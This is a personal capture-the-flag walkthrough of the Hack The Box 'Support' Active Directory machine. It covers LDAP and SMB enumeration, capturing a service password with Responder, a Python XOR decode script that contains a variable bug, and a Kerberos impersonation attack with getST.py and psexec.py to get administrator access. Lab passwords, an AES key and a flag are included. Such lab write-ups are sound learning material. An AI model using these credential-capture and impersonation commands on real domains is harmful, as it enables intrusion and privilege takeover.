This box could be domain controller [Because there is kerberos-sec]
we can enumerate ldap to find information
We can create a session using msrpc - possible reverse shell
Priorities for enumeration:
SMB - Shares and login access (will use smbclient, crackmapexec)
LDAP - (nmap script - windapsearch.py)
Kerberos -
DNS: Ensure you add the DNS to the /hosts file
RPC
- Possible WinRM?
Enumeration Goal:
Credentials
Anonymous access
Net-Shares
Null sessions
Login default passwords
ICE BREAKER!
LDAP
What is LDAP?
LDAP is a lightweight directory access protocol (LDAP) that helps users find information/data about the organisations, personel and other relevant information in a server. The goals of LDAP is devided into two.
It is to store information/data in the directory and the second one is to authenticate its users to access the directory
How to enumerate LDAP?
┌──(bsail㉿hackOn)-[~/Desktop/HTB/normal_boxes/Support]
└─$ nmap -n -sV --script "ldap*" 10.10.11.174 -Pn
Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-07 15:28 AEST
NSE: [ldap-brute] passwords: Time limit 10m00s exceeded.
Nmap scan report for 10.10.11.174
Host is up (0.024s latency).
Not shown: 990 filtered tcp ports (no-response)
Bug in ldap-brute: no string output.
Bug in ldap-brute: no string output.
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-10-07 05:29:06Z)
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: support.htb, Site: Default-First-Site-Name)
| ldap-rootdse:
| LDAP Results
| <ROOT>
| domainFunctionality: 7
| forestFunctionality: 7
| domainControllerFunctionality: 7
| rootDomainNamingContext: DC=support,DC=htb
| ldapServiceName: support.htb:dc$@SUPPORT.HTB
| isGlobalCatalogReady: TRUE
| subschemaSubentry: CN=Aggregate,CN=Schema,CN=Configuration,DC=support,DC=htb
| serverName: CN=DC,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=support,DC=htb
| schemaNamingContext: CN=Schema,CN=Configuration,DC=support,DC=htb
| namingContexts: DC=support,DC=htb
| namingContexts: CN=Configuration,DC=support,DC=htb
| namingContexts: CN=Schema,CN=Configuration,DC=support,DC=htb
| namingContexts: DC=DomainDnsZones,DC=support,DC=htb
| namingContexts: DC=ForestDnsZones,DC=support,DC=htb
| isSynchronized: TRUE
| highestCommittedUSN: 82028
| dsServiceName: CN=NTDS Settings,CN=DC,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=support,DC=htb
| dnsHostName: dc.support.htb
| defaultNamingContext: DC=support,DC=htb
| currentTime: 20231007053907.0Z
|_ configurationNamingContext: CN=Configuration,DC=support,DC=htb
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: support.htb, Site: Default-First-Site-Name)
| ldap-rootdse:
| LDAP Results
| <ROOT>
| domainFunctionality: 7
| forestFunctionality: 7
| domainControllerFunctionality: 7
| rootDomainNamingContext: DC=support,DC=htb
| ldapServiceName: support.htb:dc$@SUPPORT.HTB
| isGlobalCatalogReady: TRUE
|
| subschemaSubentry: CN=Aggregate,CN=Schema,CN=Configuration,DC=support,DC=htb
| serverName: CN=DC,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=support,DC=htb
| schemaNamingContext: CN=Schema,CN=Configuration,DC=support,DC=htb
| namingContexts: DC=support,DC=htb
| namingContexts: CN=Configuration,DC=support,DC=htb
| namingContexts: CN=Schema,CN=Configuration,DC=support,DC=htb
| namingContexts: DC=DomainDnsZones,DC=support,DC=htb
| namingContexts: DC=ForestDnsZones,DC=support,DC=htb
| isSynchronized: TRUE
| highestCommittedUSN: 82028
| dsServiceName: CN=NTDS Settings,CN=DC,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=support,DC=htb
| dnsHostName: dc.support.htb
| defaultNamingContext: DC=support,DC=htb
| currentTime: 20231007053907.0Z
|_ configurationNamingContext: CN=Configuration,DC=support,DC=htb
3269/tcp open tcpwrapped
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Im unsure if I did this correctly but it wasnt much of help.
Moving forward to SMB.
Enumerating SMB
Crackmapexec
As per the photo above it seems there is a DC on port 445 with a share drive \D: that we could potentially check and identify. Lets check using --shares to see if there are more shares we can obtain.
I tried running #enum4linux and I noticed that in the password policy there are some errors looking for a session request. I am guessing that there could be a possible credential that we can find inside this share drive.
Using Smbclient to access shares.
Smbclient
Going through all the trouble of searching the smbclient, and trying to make the smbclient work after so many forum dives. I manage to check the /support-tools share. From here I downloaded the binaries and .zip files into my Kali box and started playing with them. The next goal is to enumerate the .exe and .zip folders in a Windows box
Windows Enumeration
Moving forward: We will move into a Windows box with the following tools on hand.
DNSpy.exe
good ol POWERSHELL
Executing UserInfo.exe
If you execute the binary without its supporting environment in the same directory, you will obtain this result instead (From 0xdF guide).
The correct way of executing it:
Using windows I run to a couple of issues:
Openvpn from HTB will have issues accepting the certificate and it took me quite a while to figure out so I decided with the time constrains I have I needed to find other ways.
I realised that I only needed the binary to run, so I could potentially identify the user. If there are other ways I could do this I could maybe query it better.
Work around:
Decided to find other emulators in Linux that can run the binary.
I found mono & wine.
wine64 have issues and requires other dependency on my own client, again with time constraints I have I decided to use mono and it seems to work fine
Obtaining User Credentials
Tools:
Mono: a windows binary emulator
Responder
Strategy of this technique will include:
sudo responder -A -v -I eth0
Set-up our own IP to be connected with the DNS
Before we being ensure that you change the support dns IP to your own IP, so that responder can work with the given eth0.
It is ideal to begin setting up your responder proxy, and wait for further request from your exe.
Ones the program is set, use "mono" and follow the scenario.
As you are playing with the executable do not forget to check the proxy results as the binary will try to request to the server to find the given parameters. With this technique the requests are not encrypted through out the conversation and you will be able to see the plaintext password.
Note that this can also be done using Wireshark.
Password: nvEfEk16^1aM4$e7AclUf8x$tRWxOW91%lmz
Password LDAP Decryption Script
The second way to obtain the password is to convert the obtained script from DNspy using a scripting language.
import base64
#Variable Set up
enc_password = "0Nv32PTwgYjzg9/8j5TbmvPd3e7WhtWWyuPsyO76/Y+U193E"
_key = "armando"
#Use byte array and then use the base64 decode function
decode_this = bytearray(base64.b64decode(enc_password))
#Use for loop to decode the variable using each key for the XOR operation
for x in range(len(decode_this)):
decode_this[x] ^= ord(_key[i % len(_key)])^223
#Print Decoded Value
decoded_pass = decode_this.decode()
print(decoded_pass)
Result:
Point to note: There are other ways to obtain the password, and there are multiple ways to decode it using a script. I am by no means a master and it took me a few couple good days researching how base64 and XOR work to decode this.
Calling ldap using ldapresearch using the obtained password
Tools used:
ldapsearch
ldapdomaindump
Goal:
Look for a credential
Look for a password
I was having a hard time using the actual tool, it took me like atleast a couple of hours to figure out if the network VPN was broken, or am I just having a brain fart for not figuring why the LDAP could not bind however with the screen shot below, reversing the order does miracles and work. I found the solution on a specific website and I will post the link below.
Using the ldap query below I manage to look at the ldap information and the users that are on the server.
After the request you will recieve multiple files which includes:
HTML
JSON
GREP
Since Im super lazy I spun a quick python3 server in the directory and started browsing/enumerating the dump files.
Example of Python3 server Set up:
Credential Hunting
So looking at the files that was obtained from the dump I quickly checked the domain users section as they usually have something interesting happening.
Expanding on "Support" credential
As we are searching for more information about support we found that it has a "Remote Management Users", "Shared Support Account" priv in it. BINGO! That is our username.
Looking for password
Obtained from domain_users.json (After hours and hours of search)...
Credentials For Reverse Shell
Username: support
Passoword: "Ironside47pleasure40Watchful"
Reverse Shell
User.txt
d9e79134f2ed503af804ed93b84d0842
Priv Escalation Enumeration
Enumerate Remote Box (For more information)
Tools:
Sharphound
BloodHound
Uploaded SharpHound to the box:
So on the screenshot below, you will see the infortmation that the SharpHound executed with, and make sure to download the file and upload to your BloodHound
Upload the result of the Blood Hound to find a node called SHARED.DC.SUPPORT.HTB, this node has a "Generic All" permissions with is prettyt much similar to a READ-WRITE-EXECUTE permission level over the DC.SUPPORT.HTB.
// Some code
####KALI SIDE/ATTACKER SIDE####
Create TGT Key from Kerberos request: Req a new TGT from 'dc.support.htb' - We are currently faking that we are the "administrator"
python3 getST.py support.htb/NotTrue -dc-ip dc.support.htb -impersonate administrator -spn http/dc.support.htb -aesKey 35968C91CF211A48166F61C736CAE5BB2DD4E0F7DA1248D082C31854879BDAFB
# Change the local var to KERB5CCNAME && pass the ccahe TGT to the requested service.
export KRB5CCNAME=administrator.ccache
# Use psexec.py to connect with the TGT we just made to the server as the user administrator
KRB5CCNAME=administrator.ccache
psexec.py support.htb/administrator@dc.support.htb -k -no-pass
ROOT FLAG
BEYOND ROOT (TBA)1
Resources
I used NMAP script to enumerate LDAP - or you can use:
-
Credit to For the PrivEsc walkthrough, I tried to do it on my own however im not capable enough to do the AD Priv Esc area. I learned quit a few techniques along the way and I changed some path ways that I felt comfrotable doing.
